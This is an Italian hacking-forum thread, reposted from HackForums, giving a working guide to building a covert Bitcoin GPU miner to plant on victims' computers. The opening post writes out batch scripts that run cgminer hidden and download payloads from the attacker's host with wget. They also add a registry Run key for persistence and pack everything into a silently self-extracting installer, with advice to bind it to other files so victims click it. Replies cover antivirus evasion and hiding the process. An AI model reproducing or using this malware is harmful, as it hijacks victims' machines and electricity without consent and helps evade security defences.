Hyip [GUIDA] Creare un Silent GPU Miner per Bitcoin

Stato
Discussione chiusa ad ulteriori risposte.

yiyang

Utente Emerald
4 Agosto 2011
976
52
386
519
Ultima modifica:
Bitcoin-225.png


Con questa guida vi spiegherà passo per passo su come creare una semplice ed efficace Silent GPU Miner senza dover spendere nulla.

Nè l'autore nè il forum stesso si assumeranno le responsabilità di un uso illegale di questa guida, la guida è stata creata esclusivamente per scopi informatici/didattici.


Caratteristiche del SILENT MINER:
- Autoavvio assieme a Windows
- Undetectabile
- Processore totalmente Invisibile (o almeno nel mio caso, l'ho trovato solamente con ProcessExplorer fra i processori attivi di explorer.exe)
- Uso di GPU con priorità normale (quindi non causerà lag o scatti alla vittima)
- Gratuito
- Free
- Kostenlos
- 免费
- δωρεάν
- бесплатно



Materiali necessari:
- CGMiner
- NirCMD
- Winrar
- Wget



Procedimento:
Scaricate CGMINER (Index of /apps/cgminer), possibilmente l'ultima versione ovvero 3.8.2 ed estraetelo in una cartella qualunque.
Servirà per minare i nostri i BITCOIN.

Scaricate NirCMD (NirCmd - Windows command line tool), selezionate nircmd.exe e trascinatelo nella cartella dove avete estratto CGMiner.
Servirà per startare CGMiner in modalità invisibile.
Immagine.png

Create un file TXT e incollate questo:
SET NRCMD="%appdata%\miner\nircmd.exe"
SET ARG1=-u username
SET ARG2=-p password -I d
SET ARGNRCMD=exec hide
SET ARG0=-o stratum+tcp://stratum.mining.eligius.st:3334
SET MINER="%appdata%\miner\cgminer.exe"
%NRCMD% %ARGNRCMD% %MINER% %ARG0% %ARG1% %ARG2%
Dove nella parte rossa andranno inseriti i nostri dati; salvate tutto come start.bat nella cartella dove avete estratto CGMiner.
Immagines.png

Perfetto, ora il nostro Silent Miner è finito, ora comprimete tutta la cartella in un file RAR e inseritelo in un'altra cartella, denominate il file RAR setup.rar.
Inserite nella stessa cartella dove avete messo setup.rar anche il software Rar.exe che troverete nella vostra cartella di installazione di Winrar.
Immaginessss.png
Immaginesssssss.png

Ora dobbiamo uploadare questi 2 file in un sito hosting, qualsiasi file hosting va' benissimo basta che abbia un link diretto sempre raggiungibile.
Per i scocconi, potete farlo anche tramite FTP sul vostro sito, basta che facciate poi www.miosito.it/rar.exe
Per questa guida useremo ge.tt e, quindi, uploadate i 2 file ed ottenete i loro link diretti.
Immaginesssss.png

Installer:
Creemo ora l'installer per il nostro Silent Miner.
Create un file TXT ed inserite:
SET INSTALLPATH=%appdata%\miner
mkdir %INSTALLPATH%
wget.exe http://miosito.it/RAR.exe -O "%INSTALLPATH%\rar.exe"
wget.exe http://miosito.it/setup.rar -O "%INSTALLPATH%\setup.rar"
%INSTALLPATH%\RAR.exe x -o+ %INSTALLPATH%\setup.rar %INSTALLPATH%\
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "miner" /d "\"%INSTALLPATH%\nircmd.exe\" exec hide \"%INSTALLPATH%\start.bat\"" /f
start %INSTALLPATH%\nircmd.exe exec hide %INSTALLPATH%\start.bat
Dove http://miosito.it/RAR.exe e http://miosito.it/setup.rar inserirete i vostri link diretti.
Salvate tutto come installer.bat ed inseritelo in una cartella.

Dentro alla cartella dove si trova anche installer.bat inserite pure WGet (WGET 1.11.4 for Windows (win32)) e nircmd.exe.
ssss.png

Selezionate i 3 file e comprimeteli in un nuovo file RAR con il nome che più vi piace stando attenti che l'estensione sia .exe, spuntate le opzioni "Crea un archivio auto-estraente" e "Crea un archivio solido" per poi inserire come metodo di compressione quello "Migliore".
asdas.png

Andate poi in Commenti ed inserite
Path=%temp%
SavePath
Setup="%temp%\nircmd.exe" exec hide "%temp%\installer.bat"
Silent=1
Overwrite=1
asdasdasdas.png

Confermate e create il file RAR ed avrete il vostro Installer dove, non appena la vittima ci cliccherà, verrà infettato e comincerà a minare per voi.
Potete nascondere Il Silent Miner con qualche buon Binder, in questo modo almeno la vittima ci cliccherà :asd:
asdasdasdasd.png

Note:
- Se cambiate il nome cgminer.exe anche il nome del processore che mina verrà cambiata, in questo caso vi basterà cambiare sia il nome nella cartella CGMiner sia nel file Batch.

- Se volete disinfettarvi vi basterà creare un file TXT ed inserire
taskkill /IM cgminer.exe /F
del %appdata%\miner\* /Q
rmdir %appdata%\miner
reg DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run / v "miner" /f
Salvate il tutto come uninstall.bat ed avviatelo.

- Se dovete usare un IP STRATUM, non cancellate stratum+tcp://; invece, se dovete usare un IP NON STRATUM, cancellate stratum+tcp:// ed immettete solamente l'IP della Pool.


Fonti: HackForums
 
Ti scoperei se non fosse che sono troppo povero per permettermi una scopa.

Puoi fare una guida su come inserirlo in programmi/botnet? :\
 
Ultima modifica:
Bitcoin-225.png


Con questa guida vi spiegherà passo per passo su come creare una semplice ed efficace Silent GPU Miner senza dover spendere nulla.

Nè l'autore nè il forum stesso si assumeranno le responsabilità di un uso illegale di questa guida, la guida è stata creata esclusivamente per scopi informatici/didattici.


Caratteristiche del SILENT MINER:
- Autoavvio assieme a Windows
- Undetectabile
- Processore totalmente Invisibile (o almeno nel mio caso, l'ho trovato solamente con ProcessExplorer fra i processori attivi di explorer.exe)
- Uso di GPU con priorità normale (quindi non causerà lag o scatti alla vittima)
- Gratuito
- Free
- Kostenlos
- 免费
- δωρεάν
- бесплатно



Materiali necessari:
- CGMiner
- NirCMD
- Winrar
- Wget



Procedimento:
Scaricate CGMINER (Index of /apps/cgminer), possibilmente l'ultima versione ovvero 3.8.2 ed estraetelo in una cartella qualunque.
Servirà per minare i nostri i BITCOIN.

Scaricate NirCMD (NirCmd - Windows command line tool), selezionate nircmd.exe e trascinatelo nella cartella dove avete estratto CGMiner.
Servirà per startare CGMiner in modalità invisibile.
Immagine.png

Create un file TXT e incollate questo:

Dove nella parte rossa andranno inseriti i nostri dati; salvate tutto come start.bat nella cartella dove avete estratto CGMiner.
Immagines.png

Perfetto, ora il nostro Silent Miner è finito, ora comprimete tutta la cartella in un file RAR e inseritelo in un'altra cartella, denominate il file RAR setup.rar.
Inserite nella stessa cartella dove avete messo setup.rar anche il software Rar.exe che troverete nella vostra cartella di installazione di Winrar.
Immaginessss.png
Immaginesssssss.png

Ora dobbiamo uploadare questi 2 file in un sito hosting, qualsiasi file hosting va' benissimo basta che abbia un link diretto sempre raggiungibile.
Per i scocconi, potete farlo anche tramite FTP sul vostro sito, basta che facciate poi www.miosito.it/rar.exe
Per questa guida useremo ge.tt e, quindi, uploadate i 2 file ed ottenete i loro link diretti.
Immaginesssss.png

Installer:
Creemo ora l'installer per il nostro Silent Miner.
Create un file TXT ed inserite:

Dove http://miosito.it/RAR.exe e http://miosito.it/setup.rar inserirete i vostri link diretti.
Salvate tutto come installer.bat ed inseritelo in una cartella.

Dentro alla cartella dove si trova anche installer.bat inserite pure WGet (WGET 1.11.4 for Windows (win32)) e nircmd.exe.
ssss.png

Selezionate i 3 file e comprimeteli in un nuovo file RAR con il nome che più vi piace stando attenti che l'estensione sia .exe, spuntate le opzioni "Crea un archivio auto-estraente" e "Crea un archivio solido" per poi inserire come metodo di compressione quello "Migliore".
asdas.png

Andate poi in Commenti ed inserite

asdasdasdas.png

Confermate e create il file RAR ed avrete il vostro Installer dove, non appena la vittima ci cliccherà, verrà infettato e comincerà a minare per voi.
Potete nascondere Il Silent Miner con qualche buon Binder, in questo modo almeno la vittima ci cliccherà :asd:
asdasdasdasd.png

Note:
- Se cambiate il nome cgminer.exe anche il nome del processore che mina verrà cambiata, in questo caso vi basterà cambiare sia il nome nella cartella CGMiner sia nel file Batch.

- Se volete disinfettarvi vi basterà creare un file TXT ed inserire

Salvate il tutto come uninstall.bat ed avviatelo.



Fonti: HackForums

veramente una bella guida ;) comunque non e che mi potresti dire perche anche se i file li salvo con l'estensione .bat rimangono cmq dei file di testo? o_O ho provato a cercare una soluzione su internet ma non ho trovato niente :)


ci sono riuscito da solo tranquillo xD
 
Però il silent miner di BTC è quello meno profittevole.

- - - Updated - - -

Comunque non ho capito in questa parte rossa che dati bisogna inserire!?
SET NRCMD="%appdata%\miner\nircmd.exe"
SET ARG1=-u username
SET ARG2=-p password -I d
SET ARGNRCMD=exec hide
SET ARG0=-o stratum+tcp://stratum.mining.eligius.st:3334
SET MINER="%appdata%\miner\cgminer.exe"
%NRCMD% %ARGNRCMD% %MINER% %ARG0% %ARG1% %ARG2%
 
Nella parte Username immetti il nome del tuo Worker
Nella parte Password immetti la password del tuo worker.
Per l'ip dipende da pool a pool, ma ti consiglio di usare gli ip di Stratum in quanto sono anonimi quindi, una protezione maggiore.

Io consiglio Eligius che ha 0% di tasse ma c'è anche mining.bitcoin.cz non è male.
 
  • Mi piace
Reazioni: kronozfx
Ultima modifica:
Ma su Eligius non ci sono user e password .-. Che mettiamo nel txt del bat?
 
Ultima modifica:
Google is your Friend :sisi:
Eligius non richiede registrazione, devi immetere nel campo Username il numero del tuo Wallet Bitcoin.Per la Password metti una a piacere o semplicemente non immettere.
 
Ho provato, e ha funzionato, tuttavia ad antivirus spento, infatti puoi sempre criptare l'installer, ma esso installerà a sua volta altre componenti come .bat che vengono rilevati immediatamente quando vengono installati in Appdata, quindi è utile solo in caso la vittima non ha un antivirus.
 
Ho provato, e ha funzionato, tuttavia ad antivirus spento, infatti puoi sempre criptare l'installer, ma esso installerà a sua volta altre componenti come .bat che vengono rilevati immediatamente quando vengono installati in Appdata, quindi è utile solo in caso la vittima non ha un antivirus.

Quoto perfettamente!
 
Ho provato, e ha funzionato, tuttavia ad antivirus spento, infatti puoi sempre criptare l'installer, ma esso installerà a sua volta altre componenti come .bat che vengono rilevati immediatamente quando vengono installati in Appdata, quindi è utile solo in caso la vittima non ha un antivirus.

Il mio Kaspersky non aveva rilevato nulla, deve essere un po' indietro con i tempi :sisi:
"Poco è meglio di nulla :asd:"

Ottimo lavoro, +1 :)
:sex::sex::sex::sex::sex::sex::sex::sex::sex::sex::sex::sex::sex::sex:
 
Ultima modifica:
io devo aver sbagliato qualcosa perché il miner non starta da solo... ma sono io a dover andare in appdata per eseguirlo :nuu:
 
Ok ci ho fatto il silent miner di primecoin seguendo questa guida e riadattandola :D

Devo solo trovare il modo per nasconderlo dai processi, ed è pronto :p
 
Ok ci ho fatto il silent miner di primecoin seguendo questa guida e riadattandola :D

Devo solo trovare il modo per nasconderlo dai processi, ed è pronto :p

Si adatterebbe ad ogni Moneta, dai Primecoin ai Litecoin, ma il problema principale è che questi utilizzano CPU e non GPU.
 
Scusami, ho un problema, quando eseguo il file installer.bat , riesce a scaricare i files ma poi dice che non riesce a trovare "nircmd.exe" nel percorso "C:/Users/DardoTheMaster/AppData/Roaming/miner/nircmd.exe " Puoi darmi una mano perfavore?
 
Stato
Discussione chiusa ad ulteriori risposte.